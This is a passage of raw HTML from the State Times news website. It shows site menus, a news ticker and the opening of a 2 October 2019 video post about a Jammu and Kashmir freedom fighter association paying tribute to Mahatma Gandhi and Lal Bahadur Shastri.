id='mn-ul-latest-58085'></ul><a href='http://news.statetimes.in/section/news/jknews/crime-watch/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58084' data-id='1355' data-object='category' data-layout=''><ul id='mn-ul-latest-58084'></ul><a href='http://news.statetimes.in/section/news/jknews/courts/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58081' data-id='1349' data-object='category' data-layout=''><ul id='mn-ul-latest-58081'></ul><a href='http://news.statetimes.in/section/news/jknews/art-culture/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58101' data-id='20' data-object='category' data-layout=''><ul id='mn-ul-latest-58101'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/tade-who-won-rs-1-cr-on-kbc-made-poll-campaign-ambassador/' title='Tade, who won Rs 1 cr on KBC, made poll campaign ambassador'><img src='http://news.statetimes.in/wp-content/uploads/2019/10/Tade-who-won-Rs-1-cr-on-KBC-made-poll-campaign-ambassador.jpg?x39047' alt='Tade, who won Rs 1 cr on KBC, made poll campaign ambassador' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/tade-who-won-rs-1-cr-on-kbc-made-poll-campaign-ambassador/' title='Tade, who won Rs 1 cr on KBC, made poll campaign ambassador'> Tade, who won Rs 1 cr on KBC, made poll campaign ambassador</a><span> - 58 mins ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/president-pm-modi-pay-homage-to-mahatma-gandhi-on-his-150th-birth-anniversary/' title='President, PM Modi pay homage to Mahatma Gandhi on his 150th birth anniversary'><img src='http://news.statetimes.in/wp-content/uploads/2018/01/kovind-modi.jpg?x39047' alt='President, PM Modi pay homage to Mahatma Gandhi on his 150th birth anniversary' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/president-pm-modi-pay-homage-to-mahatma-gandhi-on-his-150th-birth-anniversary/' title='President, PM Modi pay homage to Mahatma Gandhi on his 150th birth anniversary'> President, PM Modi pay homage to Mahatma Gandhi on his 150th birth anniversary</a><span> - 2 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/shah-urges-people-to-shun-single-use-plastic/' title='Shah urges people to shun single-use plastic'><img src='http://news.statetimes.in/wp-content/uploads/2019/06/Amit-shah_1.jpeg?x39047' alt='Shah urges people to shun single-use plastic' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/shah-urges-people-to-shun-single-use-plastic/' title='Shah urges people to shun single-use plastic'> Shah urges people to shun single-use plastic</a><span> - 2 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/mahatma-gandhi-showed-love-for-non-violence-is-only-way-to-defeat-hatred-rahul/' title='Mahatma Gandhi showed love for non-violence is only way to defeat hatred: Rahul'><img src='http://news.statetimes.in/wp-content/uploads/2017/05/School-where-Mahatma-Gandhi-studied-shuts-down-after-164-years.jpg?x39047' alt='Mahatma Gandhi showed love for non-violence is only way to defeat hatred: Rahul' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/mahatma-gandhi-showed-love-for-non-violence-is-only-way-to-defeat-hatred-rahul/' title='Mahatma Gandhi showed love for non-violence is only way to defeat hatred: Rahul'> Mahatma Gandhi showed love for non-violence is only way to defeat hatred: Rahul</a><span> - 2 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/india-national/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58105' data-id='9' data-object='category' data-layout=''><ul id='mn-ul-latest-58105'></ul><a href='http://news.statetimes.in/section/news/world/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58100' data-id='22' data-object='category' data-layout=''><ul id='mn-ul-latest-58100'></ul><a href='http://news.statetimes.in/section/news/business/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58103' data-id='21' data-object='category' data-layout=''><ul id='mn-ul-latest-58103'></ul><a href='http://news.statetimes.in/section/news/sports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58102' data-id='23' data-object='category' data-layout=''><ul id='mn-ul-latest-58102'></ul><a href='http://news.statetimes.in/section/news/science-tech/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58107' data-id='11' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58107'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/lata-mangeshkar-makes-instagram-debut/' title='Lata Mangeshkar makes Instagram debut'><img src='http://news.statetimes.in/wp-content/uploads/2016/09/Lata-Mangeshkar-gives-blessings-to-Asha-Bhosle-on-birthday.jpg?x39047' alt='Lata Mangeshkar makes Instagram debut' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/lata-mangeshkar-makes-instagram-debut/' title='Lata Mangeshkar makes Instagram debut'> Lata Mangeshkar makes Instagram debut</a><span>  1 day ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/aim-to-entertain-with-story-relevant-in-todays-times-john-on-satyameva-jayate-2/' title='Aim to entertain with story relevant in today&#8217;s times: John on &#8216;Satyameva Jayate 2&#8217;'><img src='http://news.statetimes.in/wp-content/uploads/2019/10/Aim-to-entertain-with-story-relevant-in-todays-times-John-on-Satyameva-Jayate-2.jpg?x39047' alt='Aim to entertain with story relevant in today&#8217;s times: John on &#8216;Satyameva Jayate 2&#8217;' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/aim-to-entertain-with-story-relevant-in-todays-times-john-on-satyameva-jayate-2/' title='Aim to entertain with story relevant in today&#8217;s times: John on &#8216;Satyameva Jayate 2&#8217;'> Aim to entertain with story relevant in today&#8217;s times: John on &#8216;Satyameva Jayate 2&#8217;</a><span>  1 day ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/life-for-me-is-about-fears-mashed-with-excitement-hrithik-roshan/' title='Life for me is about fears mashed with excitement: Hrithik Roshan'><img src='http://news.statetimes.in/wp-content/uploads/2016/01/Hrithik-Roshan-faces-injury-during-Mohenjo-Daro-shoot.jpg?x39047' alt='Life for me is about fears mashed with excitement: Hrithik Roshan' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/life-for-me-is-about-fears-mashed-with-excitement-hrithik-roshan/' title='Life for me is about fears mashed with excitement: Hrithik Roshan'> Life for me is about fears mashed with excitement: Hrithik Roshan</a><span>  3 days ago</span></div></li></ul><a href='http://news.statetimes.in/section/entertainment/bollywod/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58108' data-id='12' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58108'></ul><a href='http://news.statetimes.in/section/entertainment/hollywood/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58109' data-id='13' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58109'></ul><a href='http://news.statetimes.in/section/entertainment/movies/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58110' data-id='14' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58110'></ul><a href='http://news.statetimes.in/section/entertainment/television/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                                                                <div class="device-menu-wrap mom_visibility_device">
                        <div id="menu-holder" class="device-menu-holder">
                            <i class="fa-icon-align-justify mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
                        </div>
                        <ul id="menu-primary-two-1" class="device-menu mom_visibility_device"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                        </div>
                                            		    <div class="nav-buttons">
                                        			<span class="nav-button nav-login">
			    <i class="momizat-icon-users"></i>
			</span>
			<div class="nb-inner-wrap">
			    <div class="nb-inner lw-inner">
			                            <div class="mom-login-widget">
                                                        <form class="mom-login-form" action="http://news.statetimes.in/wp-login.php" method="post">
					<div class="mom-username">
						<input type="text" name="log" value="" placeholder="username">
					</div>

					<div class="mom-password">
						<input type="password" name="pwd" value="" placeholder="password">
					</div>

					<div class="mom-submit-wrapper">
						<button class="button submit user-submit" name="user-submit" type="submit">Log In</button>
						<input type="checkbox" id="rememberme" name="rememberme" value="forever" >
						<label for="rememberme"><i class="fa-icon-ok"></i>Remember Me</label>
                                                <input type="hidden" name="redirect_to" value="http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/" />
					</div>
										<span class="mlw-extra">
																		<a href="http://news.statetimes.in/wp-login.php?action=lostpassword" class="mlw-reset">Lost your Password</a>
											</span>
					                            </form>
                            			    <div class="clear"></div>
                        </div>
			    </div>
			</div>
		    		                        <span class="nav-button nav-search">
                        <i class="fa-icon-search"></i>
                    </span>
                    <div class="nb-inner-wrap search-wrap border-box">
                        <div class="nb-inner sw-inner">
                        <div class="search-form mom-search-form">
                            <form method="get" action="http://news.statetimes.in">
                                <input class="sf" type="text" placeholder="Search ..." autocomplete="off" name="s">
                                <button class="button" type="submit"><i class="fa-icon-search"></i></button>
                            </form>
                            <span class="sf-loading"><img src="http://news.statetimes.in/wp-content/themes/goodnews5/images/ajax-search-nav.gif?x39047" alt="loading..." width="16" height="16"></span>
                        </div>
                    <div class="ajax_search_results">
                    </div> <!--ajax search results-->
                    </div> <!--sw inner-->
                    </div> <!--search wrap-->
                    
                            <span class="nav-button nav-social-button twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></span>
        
                <span class="nav-button nav-social-button facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></span>        
        
                   <span class="nav-button nav-social-button gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></span>     
        
        
                        <span class="nav-button nav-social-button youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></span>
                

        

        
        
                <span class="nav-button nav-social-button tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></span>
                             <span class="nav-button nav-social-button rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></span>
        	
			    </div> <!--nav-buttons-->

                </div>
                </div> <!--nav inner-->
            </nav> <!--Navigation-->
            	    <div class="boxed-content-wrapper clearfix">
                        <div class="nav-shaddow"></div>
                         <div style="margin-top:-17px; margin-bottom:20px;"></div>
            
            <div class="inner">
                        
        <div class="breaking-news">
    <div class="the_ticker" style="margin:0;">
    <div class="bn-title"><span>Latest News</span></div>
    <div class="news-ticker animation-updown custom-animation" data-timeout="5000">
        <ul>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/">Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/congress-leaders-pays-tribute-to-mahatma-gandhi-in-jammu/">Congress Leaders pays tribute to Mahatma Gandhi in Jammu</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/india-us-to-launch-new-clean-energy-initiative-to-fuel-economic-growth-in-indo-pacific/">India, US to launch new clean energy initiative to fuel economic growth in Indo-Pacific</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/tade-who-won-rs-1-cr-on-kbc-made-poll-campaign-ambassador/">Tade, who won Rs 1 cr on KBC, made poll campaign ambassador</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/skuast-j-officers-welfare-association-calls-on-vc/">SKUAST-J Officers&#8217; Welfare Association calls on VC</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/gold-plated-dwar-at-traditional-cave-dedicated-to-pilgrims-after-puja/">Gold-plated Dwar at traditional cave dedicated to pilgrims after Puja</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/iim-jammu-celebrates-hindi-pakhwada/">IIM Jammu celebrates Hindi Pakhwada</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/border-personnel-meeting-between-india-china-held-at-nathula-pass/">Border personnel meeting between India, China held at Nathula Pass</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/aggrieved-employees-urge-hm-to-revoke-sro-202/">Aggrieved employees urge HM to revoke SRO-202</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/gcw-gnagar-students-protest-change-in-college-timing-block-bikram-chowk/">GCW G&#8217;Nagar students protest change in college timing; block Bikram Chowk</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/acb-produces-charge-sheet-against-so-in-disproportionate-assets-case/">ACB produces charge-sheet against SO in disproportionate assets case</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/woman-electrocuted/">Woman electrocuted</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/two-gangsters-nabbed-with-country-made-pistol/">Two gangsters nabbed with country made pistol</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/five-gamblers-nabbed-4/">Five gamblers nabbed</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/international-day-of-elder-persons-2019-celebrated-at-mimc-leh/">International Day of Elder Persons 2019 celebrated at MIMC Leh</a></li>
        </ul>
    </div> <!--news ticker-->
    </div>
        </div> <!--breaking news-->
            </div>
    <div class="inner">
        
                            <div class="main_container">
           <div class="main-col">
                                <div class="category-title">
                        <div class="mom_breadcrumb breadcrumb breadcrumbs"><div class="breadcrumbs-plus">
<span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/" class="home"><span itemprop="title">Home</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/video/" title="Video"><span itemprop="title">Video</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemprop="name">Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri</span></div></div>                </div>
                                        <div class="base-box blog-post p-single bp-horizontal-share post-530426 post type-post status-publish format-video has-post-thumbnail category-video post_format-post-format-video"itemscope itemtype="http://schema.org/Article">
<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
    <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2019/10/JKFFA-300x169.jpg">
    <meta itemprop="width" content="300">
    <meta itemprop="height" content="300">
  </div>
  <meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/"/>

  <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
    <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
      <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg">
      <meta itemprop="width" content="445">
      <meta itemprop="height" content="77">
    </div>
        <meta itemprop="name" content="State Times">
  </div>
  <meta itemprop="datePublished" content="2019-10-02T12:47:41+00:00"/>
  <meta itemprop="dateModified" content="2019-10-02T12:47:50+00:00"/>

<h1 class="post-tile entry-title" itemprop="headline">Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri</h1>
<div class="mom-post-meta single-post-meta"><span>on: <time datetime="2019-10-02T12:47:41+00:00" class="updated">October 02, 2019</time></span><span>In: <a href="http://news.statetimes.in/section/video/" title="View all posts in Video">Video</a></span><span>Tags: </span><span><a href="http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/#respond">No Comments</a></span><div class="post-tools"><a href="javascript:window.print()" rel="nofollow" class="print"><i class="fa-icon-print"> </i>Print</a><a href="mailto:?subject=Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri&body=Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/" rel="nofollow" class="email"><i class="fa-icon-envelope"> </i>Email</a></div></div><div class="entry-content">
               <div class="mom-social-share ss-horizontal border-box php-share" data-id="530426">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri&url=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
